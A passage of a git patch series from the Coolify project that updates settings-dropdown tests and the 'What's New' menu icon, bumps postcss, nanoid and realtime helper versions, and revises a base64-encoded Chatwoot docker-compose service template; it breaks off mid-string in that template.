+        ->toContain('aria-label="What\'s New"')
+        ->toContain('wire:click="openWhatsNewModal"')
+        ->toContain('class="relative text-left menu-item"')
+        ->toContain('class="text-left menu-item-label"')
+        ->toContain("What's New</span>")
+        ->not->toContain('<span>Changelog</span>')
+        ->not->toContain('Appearance</div>')
+        ->not->toContain("@click=\"setTheme('dark'); dropdownOpen = false\"")
+        ->not->toContain("@click=\"setTheme('light'); dropdownOpen = false\"")
+        ->not->toContain("@click=\"setTheme('system'); dropdownOpen = false\"");
+});
+
+it('opens and closes the changelog modal state', function () {
+    $component = new SettingsDropdown;
+    $component->trigger = 'changelog-sidebar';
+
+    expect($component->trigger)->toBe('changelog-sidebar')
+        ->and($component->showWhatsNewModal)->toBeFalse();
+
+    $component->openWhatsNewModal();
+
+    expect($component->showWhatsNewModal)->toBeTrue();
+
+    $component->closeWhatsNewModal();
+
+    expect($component->showWhatsNewModal)->toBeFalse();
+});
+
+it('uses the default button palette for the changelog fetch action in light mode', function () {
+    $dropdownView = file_get_contents(resource_path('views/livewire/settings-dropdown.blade.php'));
+
+    expect($dropdownView)
+        ->toContain('wire:click="manualFetchChangelog"')
+        ->not->toContain('bg-coolgray-200 hover:bg-coolgray-300');
+});
diff --git a/versions.json b/versions.json
index 78b027918..0c2bf23a2 100644
--- a/versions.json
+++ b/versions.json
@@ -1,7 +1,7 @@
 {
     "coolify": {
         "v4": {
-            "version": "4.1.1"
+            "version": "4.1.2"
         },
         "nightly": {
             "version": "4.2.0"

From ea80649b6bb9e3276da2405aafc988ee3e7a6530 Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Fri, 29 May 2026 14:02:41 +0200
Subject: [PATCH 42/90] fix(settings): update What's New menu icon

---
 resources/views/livewire/settings-dropdown.blade.php | 4 ++--
 tests/Feature/SidebarNavigationPreferencesTest.php   | 1 +
 2 files changed, 3 insertions(+), 2 deletions(-)

diff --git a/resources/views/livewire/settings-dropdown.blade.php b/resources/views/livewire/settings-dropdown.blade.php
index 4c4ccd170..0c0c000d5 100644
--- a/resources/views/livewire/settings-dropdown.blade.php
+++ b/resources/views/livewire/settings-dropdown.blade.php
@@ -108,8 +108,8 @@
         <button wire:click="openWhatsNewModal" type="button" title="What's New" aria-label="What's New"
             class="relative text-left menu-item">
             <svg class="menu-item-icon" fill="none" stroke="currentColor" viewBox="0 0 24 24" aria-hidden="true">
-                <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2"
-                    d="M9 12h6m-6 4h6m2 5H7a2 2 0 01-2-2V5a2 2 0 012-2h5.586a1 1 0 01.707.293l5.414 5.414a1 1 0 01.293.707V19a2 2 0 01-2 2z" />
+                <path stroke-linecap="round" stroke-linejoin="round" stroke-width="1.8"
+                    d="M9.813 15.904 9 18.75l-.813-2.846a4.5 4.5 0 0 0-3.091-3.091L2.25 12l2.846-.813a4.5 4.5 0 0 0 3.091-3.091L9 5.25l.813 2.846a4.5 4.5 0 0 0 3.091 3.091L15.75 12l-2.846.813a4.5 4.5 0 0 0-3.091 3.091ZM18.259 8.715 18 9.75l-.259-1.035a3.375 3.375 0 0 0-2.456-2.456L14.25 6l1.035-.259a3.375 3.375 0 0 0 2.456-2.456L18 2.25l.259 1.035a3.375 3.375 0 0 0 2.456 2.456L21.75 6l-1.035.259a3.375 3.375 0 0 0-2.456 2.456ZM16.894 20.567 16.5 21.75l-.394-1.183a2.25 2.25 0 0 0-1.423-1.423L13.5 18.75l1.183-.394a2.25 2.25 0 0 0 1.423-1.423l.394-1.183.394 1.183a2.25 2.25 0 0 0 1.423 1.423l1.183.394-1.183.394a2.25 2.25 0 0 0-1.423 1.423Z" />
             </svg>
             <span class="text-left menu-item-label" :class="collapsed && 'lg:hidden'">What's New</span>
             @if ($unreadCount > 0)
diff --git a/tests/Feature/SidebarNavigationPreferencesTest.php b/tests/Feature/SidebarNavigationPreferencesTest.php
index b77758f58..f27eccd99 100644
--- a/tests/Feature/SidebarNavigationPreferencesTest.php
+++ b/tests/Feature/SidebarNavigationPreferencesTest.php
@@ -31,6 +31,7 @@
         ->toContain('class="relative text-left menu-item"')
         ->toContain('class="text-left menu-item-label"')
         ->toContain("What's New</span>")
+        ->toContain('M9.813 15.904 9 18.75')
         ->not->toContain('<span>Changelog</span>')
         ->not->toContain('Appearance</div>')
         ->not->toContain("@click=\"setTheme('dark'); dropdownOpen = false\"")

From 6ed03a8c0a122e0f20b2769f1c857688e16fc431 Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Fri, 29 May 2026 15:25:25 +0200
Subject: [PATCH 43/90] chore(deps): bump realtime helper and postcss versions

---
 config/constants.php                    |  2 +-
 other/nightly/versions.json             |  2 +-
 package-lock.json                       | 24 ++++++++++++++----------
 package.json                            |  2 +-
 templates/service-templates-latest.json |  4 ++--
 templates/service-templates.json        |  4 ++--
 versions.json                           |  2 +-
 7 files changed, 22 insertions(+), 18 deletions(-)

diff --git a/config/constants.php b/config/constants.php
index ac3c89feb..89b633650 100644
--- a/config/constants.php
+++ b/config/constants.php
@@ -4,7 +4,7 @@
     'coolify' => [
         'version' => '4.1.2',
         'helper_version' => '1.0.14',
-        'realtime_version' => '1.0.15',
+        'realtime_version' => '1.0.16',
         'railpack_version' => '0.23.0',
         'self_hosted' => env('SELF_HOSTED', true),
         'autoupdate' => env('AUTOUPDATE'),
diff --git a/other/nightly/versions.json b/other/nightly/versions.json
index 0c2bf23a2..9c9a405aa 100644
--- a/other/nightly/versions.json
+++ b/other/nightly/versions.json
@@ -10,7 +10,7 @@
             "version": "1.0.14"
         },
         "realtime": {
-            "version": "1.0.15"
+            "version": "1.0.16"
         },
         "sentinel": {
             "version": "0.0.21"
diff --git a/package-lock.json b/package-lock.json
index ae5b214e5..bcacecc8b 100644
--- a/package-lock.json
+++ b/package-lock.json
@@ -15,7 +15,7 @@
             "devDependencies": {
                 "@tailwindcss/postcss": "4.1.18",
                 "laravel-vite-plugin": "2.0.1",
-                "postcss": "8.5.6",
+                "postcss": "8.5.15",
                 "tailwind-scrollbar": "4.0.2",
                 "tailwindcss": "4.1.18",
                 "vite": "7.3.2"
@@ -1261,7 +1261,8 @@
             "version": "5.5.0",
             "resolved": "https://registry.npmjs.org/@xterm/xterm/-/xterm-5.5.0.tgz",
             "integrity": "sha512-hqJHYaQb5OptNunnyAnkHyM8aCjZ1MEIDTQu1iIbbTD/xops91NB5yq1ZK/dC2JDbVWtF23zUtl9JE2NqwT87A==",
-            "license": "MIT"
+            "license": "MIT",
+            "peer": true
         },
         "node_modules/clsx": {
             "version": "2.1.1",
@@ -1720,9 +1721,9 @@
             }
         },
         "node_modules/nanoid": {
-            "version": "3.3.11",
-            "resolved": "https://registry.npmjs.org/nanoid/-/nanoid-3.3.11.tgz",
-            "integrity": "sha512-N8SpfPUnUp1bK+PMYW8qSWdl9U+wwNWI4QKxOYDy9JAro3WMX7p2OeVRF9v+347pnakNevPmiHhNmZ2HbFA76w==",
+            "version": "3.3.12",
+            "resolved": "https://registry.npmjs.org/nanoid/-/nanoid-3.3.12.tgz",
+            "integrity": "sha512-ZB9RH/39qpq5Vu6Y+NmUaFhQR6pp+M2Xt76XBnEwDaGcVAqhlvxrl3B2bKS5D3NH3QR76v3aSrKaF/Kiy7lEtQ==",
             "dev": true,
             "funding": [
                 {
@@ -1751,6 +1752,7 @@
             "integrity": "sha512-QP88BAKvMam/3NxH6vj2o21R6MjxZUAd6nlwAS/pnGvN9IVLocLHxGYIzFhg6fUQ+5th6P4dv4eW9jX3DSIj7A==",
             "dev": true,
             "license": "MIT",
+            "peer": true,
             "engines": {
                 "node": ">=12"
             },
@@ -1803,9 +1805,9 @@
             }
         },
         "node_modules/postcss": {
-            "version": "8.5.6",
-            "resolved": "https://registry.npmjs.org/postcss/-/postcss-8.5.6.tgz",
-            "integrity": "sha512-3Ybi1tAuwAP9s0r1UQ2J4n5Y0G05bJkpUIO0/bI9MhwmD70S5aTWbXGBwxHrelT+XM1k6dM0pk+SwNkpTRN7Pg==",
+            "version": "8.5.15",
+            "resolved": "https://registry.npmjs.org/postcss/-/postcss-8.5.15.tgz",
+            "integrity": "sha512-FfR8sjd4em2T6fb3I2MwAJU7HWVMr9zba+enmQeeWFfCbm+UOC/0X4DS8XtpUTMwWMGbjKYP7xjfNekzyGmB3A==",
             "dev": true,
             "funding": [
                 {
@@ -1823,7 +1825,7 @@
             ],
             "license": "MIT",
             "dependencies": {
-                "nanoid": "^3.3.11",
+                "nanoid": "^3.3.12",
                 "picocolors": "^1.1.1",
                 "source-map-js": "^1.2.1"
             },
@@ -1944,7 +1946,8 @@
             "version": "4.1.18",
             "resolved": "https://registry.npmjs.org/tailwindcss/-/tailwindcss-4.1.18.tgz",
             "integrity": "sha512-4+Z+0yiYyEtUVCScyfHCxOYP06L5Ne+JiHhY2IjR2KWMIWhJOYZKLSGZaP5HkZ8+bY0cxfzwDE5uOmzFXyIwxw==",
-            "license": "MIT"
+            "license": "MIT",
+            "peer": true
         },
         "node_modules/tapable": {
             "version": "2.3.0",
@@ -1989,6 +1992,7 @@
             "integrity": "sha512-Bby3NOsna2jsjfLVOHKes8sGwgl4TT0E6vvpYgnAYDIF/tie7MRaFthmKuHx1NSXjiTueXH3do80FMQgvEktRg==",
             "dev": true,
             "license": "MIT",
+            "peer": true,
             "dependencies": {
                 "esbuild": "^0.27.0",
                 "fdir": "^6.5.0",
diff --git a/package.json b/package.json
index eb199e5ea..c3fb1bc5f 100644
--- a/package.json
+++ b/package.json
@@ -9,7 +9,7 @@
     "devDependencies": {
         "@tailwindcss/postcss": "4.1.18",
         "laravel-vite-plugin": "2.0.1",
-        "postcss": "8.5.6",
+        "postcss": "8.5.15",
         "tailwind-scrollbar": "4.0.2",
         "tailwindcss": "4.1.18",
         "vite": "7.3.2"
diff --git a/templates/service-templates-latest.json b/templates/service-templates-latest.json
index b97e5ef9a..d1fb5e387 100644
--- a/templates/service-templates-latest.json
+++ b/templates/service-templates-latest.json
@@ -527,7 +527,7 @@
     "chatwoot": {
         "documentation": "https://www.chatwoot.com/docs/self-hosted/?utm_source=coolify.io",
         "slogan": "Delightful customer relationships at scale.",
-        "compose": "c2VydmljZXM6CiAgY2hhdHdvb3Q6CiAgICBpbWFnZTogJ2NoYXR3b290L2NoYXR3b290OmxhdGVzdCcKICAgIGRlcGVuZHNfb246CiAgICAgIC0gcG9zdGdyZXMKICAgICAgLSByZWRpcwogICAgZW52aXJvbm1lbnQ6CiAgICAgIC0gU0VSVklDRV9VUkxfQ0hBVFdPT1RfMzAwMAogICAgICAtIFNFQ1JFVF9LRVlfQkFTRT0kU0VSVklDRV9QQVNTV09SRF9DSEFUV09PVAogICAgICAtICdGUk9OVEVORF9VUkw9JHtTRVJWSUNFX1VSTF9DSEFUV09PVH0nCiAgICAgIC0gJ0RFRkFVTFRfTE9DQUxFPSR7Q0hBVFdPT1RfREVGQVVMVF9MT0NBTEV9JwogICAgICAtICdGT1JDRV9TU0w9JHtGT1JDRV9TU0w6LWZhbHNlfScKICAgICAgLSAnRU5BQkxFX0FDQ09VTlRfU0lHTlVQPSR7RU5BQkxFX0FDQ09VTlRfU0lHTlVQOi1mYWxzZX0nCiAgICAgIC0gJ1JFRElTX1VSTD1yZWRpczovL2RlZmF1bHRAcmVkaXM6NjM3OScKICAgICAgLSBSRURJU19QQVNTV09SRD0kU0VSVklDRV9QQVNTV09SRF9SRURJUwogICAgICAtICdSRURJU19PUEVOU1NMX1ZFUklGWV9NT0RFPSR7UkVESVNfT1BFTlNTTF9WRVJJRllfTU9ERTotbm9uZX0nCiAgICAgIC0gJ1BPU1RHUkVTX0RBVEFCQVNFPSR7UE9TVEdSRVNfREI6LWNoYXR3b290fScKICAgICAgLSAnUE9TVEdSRVNfSE9TVD0ke1BPU1RHUkVTX0hPU1Q6LXBvc3RncmVzfScKICAgICAgLSBQT1NUR1JFU19VU0VSTkFNRT0kU0VSVklDRV9VU0VSX1BPU1RHUkVTCiAgICAgIC0gUE9TVEdSRVNfUEFTU1dPUkQ9JFNFUlZJQ0VfUEFTU1dPUkRfUE9TVEdSRVMKICAgICAgLSAnUkFJTFNfTUFYX1RIUkVBRFM9JHtSQUlMU19NQVhfVEhSRUFEUzotNX0nCiAgICAgIC0gJ05PREVfRU5WPSR7Tk9ERV9FTlY6LXByb2R1Y3Rpb259JwogICAgICAtICdSQUlMU19FTlY9JHtSQUlMU19FTlY6LXByb2R1Y3Rpb259JwogICAgICAtICdJTlNUQUxMQVRJT05fRU5WPSR7SU5TVEFMTEFUSU9OX0VOVjotZG9ja2VyfScKICAgICAgLSAnTUFJTEVSX1NFTkRFUl9FTUFJTD0ke0NIQVRXT09UX01BSUxFUl9TRU5ERVJfRU1BSUx9JwogICAgICAtICdTTVRQX0FERFJFU1M9JHtDSEFUV09PVF9TTVRQX0FERFJFU1N9JwogICAgICAtICdTTVRQX0FVVEhFTlRJQ0FUSU9OPSR7Q0hBVFdPT1RfU01UUF9BVVRIRU5USUNBVElPTn0nCiAgICAgIC0gJ1NNVFBfRE9NQUlOPSR7Q0hBVFdPT1RfU01UUF9ET01BSU59JwogICAgICAtICdTTVRQX0VOQUJMRV9TVEFSVFRMU19BVVRPPSR7Q0hBVFdPT1RfU01UUF9FTkFCTEVfU1RBUlRUTFNfQVVUT30nCiAgICAgIC0gJ1NNVFBfUE9SVD0ke0NIQVRXT09UX1NNVFBfUE9SVH0nCiAgICAgIC0gJ1NNVFBfVVNFUk5BTUU9JHtDSEFUV09PVF9TTVRQX1VTRVJOQU1FfScKICAgICAgLSAnU01UUF9QQVNTV09SRD0ke0NIQVRXT09UX1NNVFBfUEFTU1dPUkR9JwogICAgICAtICdBQ1RJVkVfU1RPUkFHRV9TRVJWSUNFPSR7QUNUSVZFX1NUT1JBR0VfU0VSVklDRTotbG9jYWx9JwogICAgZW50cnlwb2ludDogZG9ja2VyL2VudHJ5cG9pbnRzL3JhaWxzLnNoCiAgICBjb21tYW5kOiAnc2ggLWMgImJ1bmRsZSBleGVjIHJhaWxzIGRiOmNoYXR3b290X3ByZXBhcmUgJiYgYnVuZGxlIGV4ZWMgcmFpbHMgcyAtcCAzMDAwIC1iIDAuMC4wLjAiJwogICAgdm9sdW1lczoKICAgICAgLSAncmFpbHMtZGF0YTovYXBwL3N0b3JhZ2UnCiAgICBoZWFsdGhjaGVjazoKICAgICAgdGVzdDoKICAgICAgICAtIENNRAogICAgICAgIC0gd2dldAogICAgICAgIC0gJy0tc3BpZGVyJwogICAgICAgIC0gJy1xJwogICAgICAgIC0gJ2h0dHA6Ly8xMjcuMC4wLjE6MzAwMCcKICAgICAgaW50ZXJ2YWw6IDVzCiAgICAgIHRpbWVvdXQ6IDIwcwogICAgICByZXRyaWVzOiAxMAogIHNpZGVraXE6CiAgICBpbWFnZTogJ2NoYXR3b290L2NoYXR3b290OmxhdGVzdCcKICAgIGRlcGVuZHNfb246CiAgICAgIC0gcG9zdGdyZXMKICAgICAgLSByZWRpcwogICAgZW52aXJvbm1lbnQ6CiAgICAgIC0gU0VDUkVUX0tFWV9CQVNFPSRTRVJWSUNFX1BBU1NXT1JEX0NIQVRXT09UCiAgICAgIC0gJ0ZST05URU5EX1VSTD0ke1NFUlZJQ0VfVVJMX0NIQVRXT09UfScKICAgICAgLSAnREVGQVVMVF9MT0NBTEU9JHtDSEFUV09PVF9ERUZBVUxUX0xPQ0FMRX0nCiAgICAgIC0gJ0ZPUkNFX1NTTD0ke0ZPUkNFX1NTTDotZmFsc2V9JwogICAgICAtICdFTkFCTEVfQUNDT1VOVF9TSUdOVVA9JHtFTkFCTEVfQUNDT1VOVF9TSUdOVVA6LWZhbHNlfScKICAgICAgLSAnUkVESVNfVVJMPXJlZGlzOi8vZGVmYXVsdEByZWRpczo2Mzc5JwogICAgICAtIFJFRElTX1BBU1NXT1JEPSRTRVJWSUNFX1BBU1NXT1JEX1JFRElTCiAgICAgIC0gJ1JFRElTX09QRU5TU0xfVkVSSUZZX01PREU9JHtSRURJU19PUEVOU1NMX1ZFUklGWV9NT0RFOi1ub25lfScKICAgICAgLSAnUE9TVEdSRVNfREFUQUJBU0U9JHtQT1NUR1JFU19EQjotY2hhdHdvb3R9JwogICAgICAtICdQT1NUR1JFU19IT1NUPSR7UE9TVEdSRVNfSE9TVDotcG9zdGdyZXN9JwogICAgICAtIFBPU1RHUkVTX1VTRVJOQU1FPSRTRVJWSUNFX1VTRVJfUE9TVEdSRVMKICAgICAgLSBQT1NUR1JFU19QQVNTV09SRD0kU0VSVklDRV9QQVNTV09SRF9QT1NUR1JFUwogICAgICAtICdSQUlMU19NQVhfVEhSRUFEUz0ke1JBSUxTX01BWF9USFJFQURTOi01fScKICAgICAgLSAnTk9ERV9FTlY9JHtOT0RFX0VOVjotcHJvZHVjdGlvbn0nCiAgICAgIC0gJ1JBSUxTX0VOVj0ke1JBSUxTX0VOVjotcHJvZHVjdGlvbn0nCiAgICAgIC0gJ0lOU1RBTExBVElPTl9FTlY9JHtJTlNUQUxMQVRJT05fRU5WOi1kb2NrZXJ9JwogICAgICAtICdNQUlMRVJfU0VOREVSX0VNQUlMPSR7Q0hBVFdPT1RfTUFJTEVSX1NFTkRFUl9FTUFJTH0nCiAgICAgIC0gJ1NNVFBfQUREUkVTUz0ke0NIQVRXT09UX1NNVFBfQUREUkVTU30nCiAgICAgIC0gJ1NNVFBfQVVUSEVOVElDQVRJT049JHtDSEFUV09PVF9TTVRQX0FVVEhFTlRJQ0FUSU9OfScKICAgICAgLSAnU01UUF9ET01BSU49JHtDSEFUV09PVF9TTVRQX0RPTUFJTn0nCiAgICAgIC0gJ1NNVFBfRU5BQkxFX1NUQVJUVExTX0FVVE89JHtDSEFUV09PVF9TTVRQX0VOQUJMRV9TVEFSVFRMU19BVVRPfScKICAgICAgLSAnU01UUF9QT1JUPSR7Q0hBVFdPT1RfU01UUF9QT1JUfScKICAgICAgLSAnU01UUF9VU0VSTkFNRT0ke0NIQVRXT09UX1NNVFBfVVNFUk5BTUV9JwogICAgICAtICdTTVRQX1BBU1NXT1JEPSR7Q0hBVFdPT1RfU01UUF9QQVNTV09SRH0nCiAgICAgIC0gJ0FDVElWRV9TVE9SQUdFX1NFUlZJQ0U9JHtBQ1RJVkVfU1RPUkFHRV9TRVJWSUNFOi1sb2NhbH0nCiAgICBjb21tYW5kOgogICAgICAtIGJ1bmRsZQogICAgICAtIGV4ZWMKICAgICAgLSBzaWRla2lxCiAgICAgIC0gJy1DJwogICAgICAtIGNvbmZpZy9zaWRla2lxLnltbAogICAgdm9sdW1lczoKICAgICAgLSAncmFpbHMtZGF0YTovYXBwL3N0b3JhZ2UnCiAgICBoZWFsdGhjaGVjazoKICAgICAgdGVzdDoKICAgICAgICAtIENNRC1TSEVMTAogICAgICAgIC0gImJ1bmRsZSBleGVjIHJhaWxzIHJ1bm5lciAncHV0cyBTaWRla2lxLnJlZGlzKCY6aW5mbyknID4gL2Rldi9udWxsIDI+JjEiCiAgICAgIGludGVydmFsOiAzMHMKICAgICAgdGltZW91dDogMTBzCiAgICAgIHJldHJpZXM6IDMKICBwb3N0Z3JlczoKICAgIGltYWdlOiAncGd2ZWN0b3IvcGd2ZWN0b3I6cGcxMicKICAgIHJlc3RhcnQ6IGFsd2F5cwogICAgdm9sdW1lczoKICAgICAgLSAncG9zdGdyZXMtZGF0YTovdmFyL2xpYi9wb3N0Z3Jlc3FsL2RhdGEnCiAgICBlbnZpcm9ubWVudDoKICAgICAgLSAnUE9TVEdSRVNfREI9JHtQT1NUR1JFU19EQjotY2hhdHdvb3R9JwogICAgICAtIFBPU1RHUkVTX1VTRVI9JFNFUlZJQ0VfVVNFUl9QT1NUR1JFUwogICAgICAtIFBPU1RHUkVTX1BBU1NXT1JEPSRTRVJWSUNFX1BBU1NXT1JEX1BPU1RHUkVTCiAgICBoZWFsdGhjaGVjazoKICAgICAgdGVzdDoKICAgICAgICAtIENNRC1TSEVMTAogICAgICAgIC0gJ3BnX2lzcmVhZHkgLVUgJFNFUlZJQ0VfVVNFUl9QT1NUR1JFUyAtZCBjaGF0d29vdCAtaCAxMjcuMC4wLjEnCiAgICAgIGludGVydmFsOiAzMHMKICAgICAgdGltZW91dDogMTBzCiAgICAgIHJldHJpZXM6IDUKICByZWRpczoKICAgIGltYWdlOiAncmVkaXM6YWxwaW5lJwogICAgcmVzdGFydDogYWx3YXlzCiAgICBjb21tYW5kOgogICAgICAtIHNoCiAgICAgIC0gJy1jJwogICAgICAtICdyZWRpcy1zZXJ2ZXIgLS1yZXF1aXJlcGFzcyAiJFNFUlZJQ0VfUEFTU1dPUkRfUkVESVMiJwogICAgdm9sdW1lczoKICAgICAgLSAncmVkaXMtZGF0YTovZGF0YScKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OgogICAgICAgIC0gQ01ECiAgICAgICAgLSByZWRpcy1jbGkKICAgICAgICAtICctYScKICAgICAgICAtICRTRVJWSUNFX1BBU1NXT1JEX1JFRElTCiAgICAgICAgLSBQSU5HCiAgICAgIGludGVydmFsOiAzMHMKICAgICAgdGltZW91dDogMTBzCiAgICAgIHJldHJpZXM6IDUK",
+        "compose": "c2VydmljZXM6CiAgY2hhdHdvb3Q6CiAgICBpbWFnZTogJ2NoYXR3b290L2NoYXR3b290OmxhdGVzdCcKICAgIGRlcGVuZHNfb246CiAgICAgIC0gcG9zdGdyZXMKICAgICAgLSByZWRpcwogICAgZW52aXJvbm1lbnQ6CiAgICAgIC0gU0VSVklDRV9VUkxfQ0hBVFdPT1RfMzAwMAogICAgICAtIFNFQ1JFVF9LRVlfQkFTRT0kU0VSVklDRV9QQVNTV09SRF9DSEFUV09PVAogICAgICAtICdGUk9OVEVORF9VUkw9JHtTRVJWSUNFX1VSTF9DSEFUV09PVH0nCiAgICAgIC0gJ0RFRkFVTFRfTE9DQUxFPSR7Q0hBVFdPT1RfREVGQVVMVF9MT0NBTEV9JwogICAgICAtICdGT1JDRV9TU0w9JHtGT1JDRV9TU0w6LWZhbHNlfScKICAgICAgLSAnRU5BQkxFX0FDQ09VTlRfU0lHTlVQPSR7RU5BQkxFX0FDQ09VTlRfU0lHTlVQOi1mYWxzZX0nCiAgICAgIC0gJ1JFRElTX1VSTD1yZWRpczovL2RlZmF1bHRAcmVkaXM6NjM3OScKICAgICAgLSBSRURJU19QQVNTV09SRD0kU0VSVklDRV9QQVNTV09SRF9SRURJUwogICAgICAtICdSRURJU19PUEVOU1NMX1ZFUklGWV9NT0RFPSR7UkVESVNfT1BFTlNTTF9WRVJJRllfTU9ERTotbm9uZX0nCiAgICAgIC0gJ1BPU1RHUkVTX0RBVEFCQVNFPSR7UE9TVEdSRVNfREI6LWNoYXR3b290fScKICAgICAgLSAnUE9TVEdSRVNfSE9TVD0ke1BPU1RHUkVTX0hPU1Q6LXBvc3RncmVzfScKICAgICAgLSBQT1NUR1JFU19VU0VSTkFNRT0kU0VSVklDRV9VU0VSX1BPU1RHUkVTCiAgICAgIC0gUE9TVEdSRVNfUEFTU1dPUkQ9JFNFUlZJQ0VfUEFTU1dPUkRfUE9TVEdSRVMKICAgICAgLSAnUkFJTFNfTUFYX1RIUkVBRFM9JHtSQUlMU19NQVhfVEhSRUFEUzotNX0nCiAgICAgIC0gJ05PREVfRU5WPSR7Tk9ERV9FTlY6LXByb2R1Y3Rpb259JwogICAgICAtICdSQUlMU19FTlY9JHtSQUlMU19FTlY6LXByb2R1Y3Rpb259JwogICAgICAtICdJTlNUQUxMQVRJT05fRU5WPSR7SU5TVEFMTEFUSU9OX0VOVjotZG9ja2VyfScKICAgICAgLSAnTUFJTEVSX1NFTkRFUl9FTUFJTD0ke0NIQVRXT09UX01BSUxFUl9TRU5ERVJfRU1BSUx9JwogICAgICAtICdTTVRQX0FERFJFU1M9JHtDSEFUV09PVF9TTVRQX0FERFJFU1N9JwogICAgICAtICdTTVRQX0FVVEhFTlRJQ0FUSU9OPSR7Q0hBVFdPT1RfU01UUF9BVVRIRU5USUNBVElPTn0nCiAgICAgIC0gJ1NNVFBfRE9NQUlOPSR7Q0hBVFdPT1RfU01UUF9ET01BSU59JwogICAgICAtICdTTVRQX0VOQUJMRV9TVEFSVFRMU19BVVRPPSR7Q0hBVFdPT1RfU01UUF9FTkFCTEVfU1RBUlRUTFNfQVVUT30nCiAgICAgIC0gJ1NNVFBfUE9SVD0ke0NIQVRXT09UX1NNVFBfUE9SVH0nCiAgICAgIC0gJ1NNVFBfVVNFUk5BTUU9JHtDSEFUV09PVF9TTVRQX1VTRVJOQU1FfScKICAgICAgLSAnU01UUF9QQVNTV09SRD0ke0NIQVRXT09UX1NNVFBfUEFTU1dPUkR9JwogICAgICAtICdBQ1RJVkVfU1RPUkFHRV9TRVJWSUNFPSR7QUNUSVZFX1NUT1JBR0VfU0VSVklDRTotbG9jYWx9JwogICAgICAtICdTQUZFX0ZFVENIX0FMTE9XX1BSSVZBVEVfTkVUV09SSz0ke1NBRkVfRkVUQ0hfQUxMT1dfUFJJVkFURV9ORVRXT1JLOi1mYWxzZX0nCiAgICBlbnRyeXBvaW50OiBkb2NrZXIvZW50cnlwb2ludHMvcmFpbHMuc2gKICAgIGNvbW1hbmQ6ICdzaCAtYyAiYnVuZGxlIGV4ZWMgcmFpbHMgZGI6Y2hhdHdvb3RfcHJlcGFyZSAmJiBidW5kbGUgZXhlYyByYWlscyBzIC1wIDMwMDAgLWIgMC4wLjAuMCInCiAgICB2b2x1bWVzOgogICAgICAtICdyYWlscy1kYXRhOi9hcHAvc3RvcmFnZScKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OgogICAgICAgIC0gQ01ECiAgICAgICAgLSB3Z2V0CiAgICAgICAgLSAnLS1zcGlkZXInCiAgICAgICAgLSAnLXEnCiAgICAgICAgLSAnaHR0cDovLzEyNy4wLjAuMTozMDAwJwogICAgICBpbnRlcnZhbDogNXMKICAgICAgdGltZW91dDogMjBzCiAgICAgIHJldHJpZXM6IDEwCiAgc2lkZWtpcToKICAgIGltYWdlOiAnY2hhdHdvb3QvY2hhdHdvb3Q6bGF0ZXN0JwogICAgZGVwZW5kc19vbjoKICAgICAgLSBwb3N0Z3JlcwogICAgICAtIHJlZGlzCiAgICBlbnZpcm9ubWVudDoKICAgICAgLSBTRUNSRVRfS0VZX0JBU0U9JFNFUlZJQ0VfUEFTU1dPUkRfQ0hBVFdPT1QKICAgICAgLSAnRlJPTlRFTkRfVVJMPSR7U0VSVklDRV9VUkxfQ0hBVFdPT1R9JwogICAgICAtICdERUZBVUxUX0xPQ0FMRT0ke0NIQVRXT09UX0RFRkFVTFRfTE9DQUxFfScKICAgICAgLSAnRk9SQ0VfU1NMPSR7Rk9SQ0VfU1NMOi1mYWxzZX0nCiAgICAgIC0gJ0VOQUJMRV9BQ0NPVU5UX1NJR05VUD0ke0VOQUJMRV9BQ0NPVU5UX1NJR05VUDotZmFsc2V9JwogICAgICAtICdSRURJU19VUkw9cmVkaXM6Ly9kZWZhdWx0QHJlZGlzOjYzNzknCiAgICAgIC0gUkVESVNfUEFTU1dPUkQ9JFNFUlZJQ0VfUEFTU1dPUkRfUkVESVMKICAgICAgLSAnUkVESVNfT1BFTlNTTF9WRVJJRllfTU9ERT0ke1JFRElTX09QRU5TU0xfVkVSSUZZX01PREU6LW5vbmV9JwogICAgICAtICdQT1NUR1JFU19EQVRBQkFTRT0ke1BPU1RHUkVTX0RCOi1jaGF0d29vdH0nCiAgICAgIC0gJ1BPU1RHUkVTX0hPU1Q9JHtQT1NUR1JFU19IT1NUOi1wb3N0Z3Jlc30nCiAgICAgIC0gUE9TVEdSRVNfVVNFUk5BTUU9JFNFUlZJQ0VfVVNFUl9QT1NUR1JFUwogICAgICAtIFBPU1RHUkVTX1BBU1NXT1JEPSRTRVJWSUNFX1BBU1NXT1JEX1BPU1RHUkVTCiAgICAgIC0gJ1JBSUxTX01BWF9USFJFQURTPSR7UkFJTFNfTUFYX1RIUkVBRFM6LTV9JwogICAgICAtICdOT0RFX0VOVj0ke05PREVfRU5WOi1wcm9kdWN0aW9ufScKICAgICAgLSAnUkFJTFNfRU5WPSR7UkFJTFNfRU5WOi1wcm9kdWN0aW9ufScKICAgICAgLSAnSU5TVEFMTEFUSU9OX0VOVj0ke0lOU1RBTExBVElPTl9FTlY6LWRvY2tlcn0nCiAgICAgIC0gJ01BSUxFUl9TRU5ERVJfRU1BSUw9JHtDSEFUV09PVF9NQUlMRVJfU0VOREVSX0VNQUlMfScKICAgICAgLSAnU01UUF9BRERSRVNTPSR7Q0hBVFdPT1RfU01UUF9BRERSRVNTfScKICAgICAgLSAnU01UUF9BVVRIRU5USUNBVElPTj0ke0NIQVRXT09UX1NNVFBfQVVUSEVOVElDQVRJT059JwogICAgICAtICdTTVRQX0RPTUFJTj0ke0NIQVRXT09UX1NNVFBfRE9NQUlOfScKICAgICAgLSAnU01UUF9FTkFCTEVfU1RBUlRUTFNfQVVUTz0ke0NIQVRXT09UX1NNVFBfRU5BQkxFX1NUQVJUVExTX0FVVE99JwogICAgICAtICdTTVRQX1BPUlQ9JHtDSEFUV09PVF9TTVRQX1BPUlR9JwogICAgICAtICdTTVRQX1VTRVJOQU1FPSR7Q0hBVFdPT1RfU01UUF9VU0VSTkFNRX0nCiAgICAgIC0gJ1NNVFBfUEFTU1dPUkQ9JHtDSEFUV09PVF9TTVRQX1BBU1NXT1JEfScKICAgICAgLSAnQUNUSVZFX1NUT1JBR0VfU0VSVklDRT0ke0FDVElWRV9TVE9SQUdFX1NFUlZJQ0U6LWxvY2FsfScKICAgIGNvbW1hbmQ6CiAgICAgIC0gYnVuZGxlCiAgICAgIC0gZXhlYwogICAgICAtIHN